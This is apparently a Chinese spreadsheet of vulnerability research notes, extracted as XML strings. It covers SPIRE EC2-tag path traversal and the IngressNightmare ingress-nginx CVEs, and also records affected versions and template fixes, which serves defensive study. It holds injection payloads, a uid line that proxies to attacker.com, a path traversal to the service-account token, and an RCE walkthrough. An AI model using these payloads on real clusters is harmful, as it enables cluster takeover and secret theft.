  <si>
    <t>是
---
攻击向量是aws ec2 配置</t>
  </si>
  <si>
    <t>1. 攻击向量：EC2标签注入
漏洞利用的核心是在EC2实例标签中注入包含路径遍历元素的值：
Copyrole: "../../../admin/privileged-service"
这个标签值包含了../路径遍历序列，用于在路径规范化过程中"向上"移动目录层级。
2. 漏洞触发条件：SPIRE配置
SPIRE服务器的配置决定了漏洞是否可被利用：
yamlCopyagent_path_template = "/spire/agent/aws_iid/account/{{.AccountID}}/region/{{.Region}}/tag/{{.Tags.role}}"
这里的关键点是：
配置使用了EC2标签作为路径的一部分（{{.Tags.role}}）
标签值被放置在路径的最后部分
缺少对标签值的路径规范化检查
----
# 1. AWS CloudFormation模板 - 创建带有恶意标签的EC2实例
AWSTemplateFormatVersion: '2010-09-09'
Description: 'EC2实例配置，用于触发SPIRE CVE-2021-27099漏洞'
Resources:
  MaliciousEC2Instance:
    Type: AWS::EC2::Instance
    Properties:
      InstanceType: t2.micro
      ImageId: ami-0c55b159cbfafe1f0  # 替换为有效的AMI ID
      KeyName: your-key-pair           # 替换为您的密钥对
      SecurityGroups:
        - !Ref InstanceSecurityGroup
      Tags:
        - Key: Name
          Value: spire-vulnerable-instance
        # 关键漏洞触发点：包含路径遍历的标签值
        - Key: role
          Value: "../../../admin/privileged-service"
  InstanceSecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Properties:
      GroupDescription: Allow SSH access
      SecurityGroupIngress:
        - IpProtocol: tcp
          FromPort: 22
          ToPort: 22
          CidrIp: 0.0.0.0/0
# 2. AWS CLI命令 - 为现有EC2实例添加恶意标签
# aws ec2 create-tags --resources i-1234567890abcdef0 --tags Key=role,Value="../../../admin/privileged-service"
# 3. SPIRE Server配置 - 使用易受攻击的aws_iid节点认证器配置
server {
  trust_domain = "example.org"
  data_dir = "/opt/spire/data/server"
  log_level = "DEBUG"
  # 其他服务器配置...
  plugins {
    NodeAttestor "aws_iid" {
      plugin_data {
        access_key_id = "AKIAIOSFODNN7EXAMPLE"
        secret_access_key = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
        # 漏洞配置点：使用EC2标签值作为代理ID模板的最后一个元素
        # 这里的role标签将被用来构建SPIFFE ID路径
        agent_path_template = "/spire/agent/aws_iid/account/{{.AccountID}}/region/{{.Region}}/tag/{{.Tags.role}}"
      }
    }
    # 其他插件配置...
  }
}
# 4. SPIRE Agent配置 - 与易受攻击的SPIRE服务器交互的代理配置
agent {
  trust_domain = "example.org"
  server_address = "spire-server"
  server_port = "8081"
  socket_path = "/tmp/agent.sock"
  plugins {
    NodeAttestor "aws_iid" {
      plugin_data {}
    }
    # 其他插件配置...
  }
}</t>
  </si>
  <si>
    <t>这个漏洞的实际关键操作函数涉及SPIRE的aws_iid节点认证器中处理路径和生成SPIFFE ID的部分。
虽然公开的漏洞信息没有明确指出具体的函数名，但通过分析SPIRE的源代码仓库和补丁内容，我可以推断以下关键操作点：
路径生成操作：
漏洞很可能出现在处理agent_path_template的代码中
这个函数负责将EC2标签值插入到模板中并生成最终的SPIFFE ID路径
可能的关键函数：
buildSpiffeID() 或类似名称的函数 - 负责构建最终的SPIFFE ID
resolveAgentIDTemplate() 或类似名称的函数 - 处理代理ID模板字符串替换
NormalizeSpiffeID() 或 sanitizePath() - 应该执行但没有正确执行路径规范化的函数
漏洞核心代码逻辑：
从AWS API获取EC2实例标签
将标签值代入模板字符串
在没有适当验证或规范化的情况下构建最终路径
生成新的SPIFFE ID并将其用于身份验证</t>
  </si>
  <si>
    <t>CVE-2025-1097 (auth-tls-match-cn Annotation Injection -&gt; authtls解析器）</t>
  </si>
  <si>
    <t>IngressNightMare</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>VE-2025-1097 漏洞以 Ingress-NGINX 控制器中的</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> auth-tls-match-cn 注释</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>为目标，该注释旨在通过将所提供证书的公用名 （CN） 字段与指定值进行匹配来强制执行客户端证书身份验证。NGINX 控制器会尝试验证此注释的值是否以前缀 CN= 开头，以及其余部分是否为有效的正则表达式。但是，此验证不够强大，无法防止攻击者注入恶意内容。通过仔细制作 annotation 值以满足肤浅的检查，攻击者可以将任意 NGINX 配置指令注入控制器生成和测试的最终配置文件中。</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">&lt; v1.11.0  
v1.11.0 - 1.11.4  
v1.12.0 </t>
  </si>
  <si>
    <t>https://github.com/kubernetes/kubernetes/issues/131007</t>
  </si>
  <si>
    <t>能够访问 NGINX 准入控制器服务的攻击者必须构建恶意 Ingress 对象来利用该漏洞。
注意：Ingress NGINX 在其 Pod 中部署一个准入控制器，旨在在部署传入的 Ingress 对象之前对其进行验证。默认情况下，无需身份验证即可通过网络访问准入控制器，这使它们成为极具吸引力的攻击媒介。</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">漏洞poc: https://github.com/sandumjacob/IngressNightmare-POCs
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>攻击路径：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>1. 发现暴露的准入控制器</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
攻击者通过扫描 Pod 网络或利用内部网络权限，发现 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">ingress-nginx Validating Admission Controller 的 HTTP 端点未正确隔离且允许外部访问（默认仅限集群内部通信，但实际部署常因网络策略不当而暴露）。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>2, 注入恶意 NGINX 配置</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
通过构造包含特定注解（如 mirror-host、auth-url）的 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">AdmissionReview 请求，攻击者诱导准入控制器生成含危险指令的 NGINX 配置文件（例如注入 load_module /path/to/malicious.so），利用 nginx -t 配置验证阶段触发代码执行。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>3. 窃取集群机密与权限提升</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
利用代码执行能力读取 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>**/var/run/secrets/kubernetes.io/serviceaccount/token**</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">（服务账户令牌），获取控制器 Pod 的高权限身份；
通过该身份访问 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>Kubernetes Secrets</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">（默认权限可跨命名空间读取所有 Secrets），窃取数据库凭据、API 密钥等敏感数据。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>4. 横向移动与集群接管</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
使用窃取的凭据创建恶意 Pod 或修改现有工作负载，部署后门；
劫持 Ingress 流量至攻击者控制的服务器，实施数据篡改或勒索；
最终通过 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>cluster-admin 权限完全控制 Kubernetes 集群</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">nginx.ingress.kubernetes.io/auth-tls-match-cn: "CN=abc #(\n){}\n }}\nglobal_injection;\n#" </t>
  </si>
  <si>
    <t>与（ 需要要使 auth-tls-match-cn 注释值显示在配置中，我们还需要提供 nginx.ingress.kubernetes.io/auth-tls-secret 注释，该注释对应于集群中存在的 TLS 证书或密钥对密钥-&gt; 具有一定的限定条件）</t>
  </si>
  <si>
    <t>网络资源</t>
  </si>
  <si>
    <t>身份验证和授权配置</t>
  </si>
  <si>
    <t>准入控制器流程（新攻击面）</t>
  </si>
  <si>
    <t xml:space="preserve">调用深度3：
func (n *NGINXController) getConfiguration(-》func (n *NGINXController) getBackendServers-》
if server.CertificateAuth.CAFileName == "" {
    server.CertificateAuth = anns.CertificateAuth // 赋值位置
    if server.CertificateAuth.Secret != "" &amp;&amp; server.CertificateAuth.CAFileName == "" {
       klog.V(3).Infof("Secret %q has no 'ca.crt' key, mutual authentication disabled for Ingress %q",
          server.CertificateAuth.Secret, ingKey)
    }
</t>
  </si>
  <si>
    <t>不存在组件中直接在模板中</t>
  </si>
  <si>
    <t>rootfs/etc/nginx/template/nginx.tmpl
直接在替换的目标模板中加校验字段
模板中：
if ( $ssl_client_s_dn !~ {{ $server.CertificateAuth.MatchCN }} ) {
修改后：
if ( $ssl_client_s_dn !~ {{ $server.CertificateAuth.MatchCN | quote }} ) {</t>
  </si>
  <si>
    <t>直接在模板文件中修复-》 实际由准入控制器调用的模板解析函数去处理校验</t>
  </si>
  <si>
    <t>模板字段增加校验规则</t>
  </si>
  <si>
    <t>使用官方的校验库</t>
  </si>
  <si>
    <t>CVE-2025-1098 （mirror UID Injection ）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>CVE-2025-1098 漏洞利用了</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> Ingress-NGINX 控制器处理 Ingress 资源的 metadata.uid 字段的方式</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>。在 Kubernetes 中，uid 通常是自动分配给每个资源的唯一标识符，用户通常不会直接作它。但是，在准入控制器的上下文中，攻击者可以制作一个虚假的 AdmissionReview 请求，在该请求中，他们完全控制了 uid 值。
在易受攻击的 Ingress NGINX 应用程序中，在呈现临时配置文件进行验证的过程中，uid 值会未经过清理地传递到 NGINX 配置模板中。具体来说，uid 作为 mirror 模块的一部分嵌入到 NGINX 配置中，该模块旨在复制请求以进行调试或分析。由于此 uid 字段不被视为典型的用户提供的注释，因此它绕过了应用于注释的通常输入验证和正则表达式检查。因此，它成为攻击者可以完全控制的新注入点。
对 Ingress-NGINX 准入控制器具有网络访问权限的攻击者可以构建包含专门设计的 uid 值的恶意 AdmissionReview 请求。通过在 uid 中插入换行符或 NGINX 指令，攻击者可以跳出预期的配置上下文，将任意 NGINX 指令直接注入临时配置文件。由于控制器对此文件运行 nginx -t 测试，因此这些注入的指令由 NGINX 进程解析和执行。</t>
    </r>
  </si>
  <si>
    <t>https://github.com/kubernetes/ingress-nginx/pull/13068/commits/2e9f37380afb7853fa6daa1c3e6659550aadfd90</t>
  </si>
  <si>
    <t>https://github.com/kubernetes/kubernetes/issues/131008</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: evil-ingress
  annotations:
    nginx.ingress.kubernetes.io/mirror-target: "http://attacker.com"
spec:
  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>uid: ";\nproxy_pass http://attacker.com; #"</t>
    </r>
  </si>
  <si>
    <t>元数据-&gt; uid(一般不可控，但由于攻击者可构造admissionreview 不需要经过api-servrer)</t>
  </si>
  <si>
    <t>元数据（uid)</t>
  </si>
  <si>
    <t>控制器
模版中</t>
  </si>
  <si>
    <t xml:space="preserve">控制器校验： 增加校验逻辑
模版： 增加校验字段
模版中：mirror {{ $location.Mirror.Source }};
修改后：mirror {{ $location.Mirror.Source | quote }};
</t>
  </si>
  <si>
    <t xml:space="preserve">控制器校验： 直接增加校验逻辑（模版函数 "buildMirrorLocations":               buildMirrorLocations,） 
直接在模板文件中修复-》 实际由准入控制器调用的模板解析函数去处理校验
</t>
  </si>
  <si>
    <t xml:space="preserve">模板字段增加校验规则
验证逻辑增加
</t>
  </si>
  <si>
    <t>CVE-2025-24514（ auth-url Annotation Injection-&gt; authreq解析器 ）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">CVE-2025-24514 漏洞针对 Ingress-NGINX 控制器处理 </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>auth-url 注释的方式</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>，该注释用于定义外部 URL 以进行身份验证。此注释旨在指向一个外部服务，该服务在允许访问后端应用程序之前验证传入请求。但是，缺陷在于控制器如何获取此注释的值并将其直接嵌入到生成的 NGINX 配置中，而无需进行适当的清理。当创建或修改 Ingress 资源时，Ingress-NGINX 的准入控制器会通过渲染临时 NGINX 配置文件并运行 nginx -t test 命令来验证配置。在此过程中，auth-url 注释中提供的值将插入到配置模板中。如果输入未正确检查或转义，攻击者可以将换行符或恶意 NGINX 指令注入到注释值中。然后，这些注入的指令在 NGINX 二进制文件的验证阶段进行处理。</t>
    </r>
  </si>
  <si>
    <t>&lt; v1.11.0  
v1.11.0 - 1.11.4  
该漏洞不适用于 v1.12.0。在这个版本中，Ingress NGINX Controller 更改了其默认安全设置 ，以根据严格的正则表达式规则验证所有注释，包括 auth-url。</t>
  </si>
  <si>
    <t>https://github.com/kubernetes/ingress-nginx/pull/13068/commits/ab470eb920924d62a197ebddd8a4cc3031a77ddf</t>
  </si>
  <si>
    <t>https://github.com/kubernetes/kubernetes/issues/131006</t>
  </si>
  <si>
    <t xml:space="preserve">nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\ninjection_point" 
注入后结果：
... 
proxy_http_version 1.1; 
set $target http://example.com/#; 
injection_point 
proxy_pass $target; 
... </t>
  </si>
  <si>
    <t>rootfs/etc/nginx/template/nginx.tmpl
直接在替换的目标模板中加校验字段
模板中：
set $target {{ $externalAuth.URL }};
修改后：
set $target {{ $externalAuth.URL | quote }};</t>
  </si>
  <si>
    <t>CVE-2025-1974（ 最危险可导致RCE-&gt;在配置验证阶段，注入的 NGINX 配置会导致 NGINX 验证器执行代码，从而允许在 Ingress NGINX Controller 的 pod 上远程执行代码 （RCE）)</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>CVE-2025-1974 是 IngressNightmare 系列中最严重的漏洞，因为它将配置注入问题转化为</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>实际的远程代码执行 （RCE）。虽然其他漏洞使攻击者能够将任意 NGINX 指令注入临时配置文件，</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>但 CVE-2025-1974 探讨了如何使用此注入在 Ingress-NGINX 控制器 Pod 中执行代码。</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">它通过利用一个强大但鲜为人知的 NGINX 指令（称为 ssl_engine）来实现这一点。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>该漏洞源于 Ingress-NGINX 准入控制器测试生成的 NGINX 配置的方式。收到 AdmissionReview 请求时，控制器会根据输入创建一个临时 NGINX 配置文件，并运行 nginx -t 命令对其进行验证。假设此验证是无害的，因为从未实际应用过配置。然而，这种假设被证明是危险的，因为某些 NGINX 指令甚至可以在测试阶段执行作。
研究人员发现，ssl_engine（来自 OpenSSL 模块的指令）可以从文件系统加载共享库 ，并且可以将 ssl_engine 放置在配置中的任何位置，使其成为注入的完美候选者。要执行代码，攻击者必须首先将恶意共享库文件放在 Pod 文件系统的某个位置。这就是 NGINX 自己的行为有帮助的地方。当 NGINX 处理大型 HTTP 请求时，它会将请求正文存储为临时文件。通过向 Pod 的 NGINX 实例发送足够大的请求，攻击者可以确保将构建为共享库的有效负载写入磁盘。尽管 NGINX 会尝试立即删除临时文件，但该进程会保持打开的文件描述符，该文件描述符仍可通过 Linux /proc 文件系统访问。
最后，攻击者制作了一个 AdmissionReview 请求，该请求注入了一个 ssl_engine 指令，指向 /proc 中的打开文件描述符。当 nginx -t 运行时，注入的指令会导致 NGINX 加载攻击者的库，从而导致 Pod 内部的任意代码执行。由于准入控制器以高权限运行，并且通常有权访问所有集群密钥，因此此代码执行可能会升级为完全集群泄露。</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">&lt; v1.11.0  
v1.11.0 - 1.11.4  
</t>
  </si>
  <si>
    <t>https://github.com/kubernetes/kubernetes/issues/131009</t>
  </si>
  <si>
    <t>漏洞poc: https://github.com/sandumjacob/IngressNightmare-POCs</t>
  </si>
  <si>
    <t>代码执行-&gt; 提权( 远程代码执行）</t>
  </si>
  <si>
    <t xml:space="preserve">直接注入
</t>
  </si>
  <si>
    <t>CVE-2025-24513 （auth secret file path traversal vulnerability)</t>
  </si>
  <si>
    <t xml:space="preserve">A security issue was discovered in ingress-nginx where attacker-provided data are included in a filename by the ingress-nginx Admission Controller feature, resulting in directory traversal within the container. This could result in denial of service, or when combined with other vulnerabilities, limited disclosure of Secret objects from the cluster.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Affected versions
&lt; 1.11.5
&gt;= 1.12.0-beta.0, &lt; 1.12.1</t>
  </si>
  <si>
    <t>Patched versions
1.11.5
1.12.1
https://github.com/kubernetes/ingress-nginx/pull/13068/commits/cbc159094f6d1b1bf8cf1761eb119138d1f95df1</t>
  </si>
  <si>
    <t>https://github.com/kubernetes/kubernetes/issues/131005
https://github.com/advisories/GHSA-242m-6h72-7hgp</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">漏洞poc: https://github.com/sandumjacob/IngressNightmare-POCs
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>攻击路径</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">：
1. 发现暴露的准入控制器
攻击者通过扫描 Pod 网络或利用内部网络权限，发现 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">ingress-nginx Validating Admission Controller 的 HTTP 端点未正确隔离且允许外部访问（默认仅限集群内部通信，但实际部署常因网络策略不当而暴露）。
2, 注入恶意 NGINX 配置
通过构造包含特定注解（如 mirror-host、auth-url）的 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">AdmissionReview 请求，攻击者诱导准入控制器生成含危险指令的 NGINX 配置文件（例如注入 load_module /path/to/malicious.so），利用 nginx -t 配置验证阶段触发代码执行。
3. 窃取集群机密与权限提升
利用代码执行能力读取 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>**/var/run/secrets/kubernetes.io/serviceaccount/token**</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">（服务账户令牌），获取控制器 Pod 的高权限身份；
通过该身份访问 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>Kubernetes Secrets</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">（默认权限可跨命名空间读取所有 Secrets），窃取数据库凭据、API 密钥等敏感数据。
4. 横向移动与集群接管
使用窃取的凭据创建恶意 Pod 或修改现有工作负载，部署后门；
劫持 Ingress 流量至攻击者控制的服务器，实施数据篡改或勒索；
最终通过 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">cluster-admin 权限完全控制 Kubernetes 集群
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>敏感文件泄露</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
控制器尝试读取目标 Token 文件，若文件内容符合 user:password 格式，会将其写入日志或返回错误信息，攻击者可通过日志获取 Token。</t>
    </r>
  </si>
  <si>
    <t>DOS、信息泄露</t>
  </si>
  <si>
    <t>拒绝服务、信息泄露（集群中的secret 可能被有限制地泄露）
路径遍历导致的有限的文件读</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: exploit-ingress
  annotations:
    nginx.ingress.kubernetes.io/auth-type: basic  # 启用 Basic 认证
    nginx.ingress.kubernetes.io/auth-secret: "test"
  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">uid: "../../var/run/secrets/kubernetes.io/serviceaccount/token"  # 强制覆盖 UID（需绕过 Kubernetes 限制）
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
spec:
  ingressClassName: nginx
  rules:
  - host: "attacker.com"
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: dummy-service
            port:
              number: 80</t>
    </r>
  </si>
  <si>
    <t>网络</t>
  </si>
  <si>
    <t>调用深度:4
checkIngress-&gt;parsed, err := annotations.NewAnnotationExtractor(n.store).Extract(ing)-&gt; val, err := annotationParser.Parse(ing)-&gt;
passFilename := fmt.Sprintf("%v/%v-%v-%v.passwd", a.authDirectory, ing.GetNamespace(), ing.UID, secret.UID)
err = dumpSecretAuthFile(passFilename, secret)
【与其他的ingressnightmare不同，具体的sink点发生在解析字段值的位置】</t>
  </si>
  <si>
    <t>admission webhook-&gt; parser 组件</t>
  </si>
  <si>
    <t xml:space="preserve">在注解的Parser 解析器中直接加check 
auth parser:
passFileName := fmt.Sprintf("%v-%v-%v.passwd", ing.GetNamespace(), ing.UID, secret.UID)
 passFilePath := filepath.Join(a.authDirectory, passFileName)
 // Ensure password file name does not contain any path traversal characters.
 if a.authDirectory != filepath.Dir(passFilePath) || passFileName != filepath.Base(passFilePath) {
  return nil, ing_errors.LocationDeniedError{
   Reason: fmt.Errorf("invalid password file name: %s", passFileName),
  }
 }
新增check
</t>
  </si>
  <si>
    <t>admission webhook</t>
  </si>
  <si>
    <t>使用官方的路径校验库</t>
  </si>
  <si>
    <t>CVE_ID</t>
  </si>
  <si>
    <t>中文描述</t>
  </si>
  <si>
    <t>攻击面</t>
  </si>
  <si>
    <t>利用方式</t>
  </si>
  <si>
    <t>K8s资源示例</t>
  </si>
  <si>
    <t>拒绝服务类漏洞（可能不纳入筛选）</t>
  </si>
  <si>
    <t>原因细分类别</t>
  </si>
  <si>
    <t>涉及的资源</t>
  </si>
  <si>
    <t>CVE-2024-7646(对CVE-2021-25742的绕过）</t>
  </si>
  <si>
    <t xml:space="preserve">
在ingress-nginx中发现一个安全问题，拥有创建Ingress对象权限（属于`networking.k8s.io`或`extensions` API组）的攻击者可绕过注解验证注入任意命令，从而获取ingress-nginx控制器的凭证。在默认配置中，该凭证具有访问集群中所有Secret的权限。</t>
  </si>
  <si>
    <t>**攻击面**:  
   - 拥有`Ingress`对象创建/更新权限的用户或服务账号  
   - 默认ingress-nginx ServiceAccount权限过高（可读所有Secret）</t>
  </si>
  <si>
    <t>**利用方式**:  
   - 攻击者创建含恶意注解的Ingress，利用nginx配置渲染阶段的命令注入漏洞  
   - 注入的命令窃取ingress-nginx控制器凭据，进而访问集群内所有Secret</t>
  </si>
  <si>
    <t xml:space="preserve">ingress.kubernetes.io/server-snippet
（ http 响应拆分攻击）
nginx.ingress.kubernetes.io/auth-tls-verify-client
使用\r 进行注入
</t>
  </si>
  <si>
    <t>apiVersion: networking.k8s.io/v1
   kind: Ingress
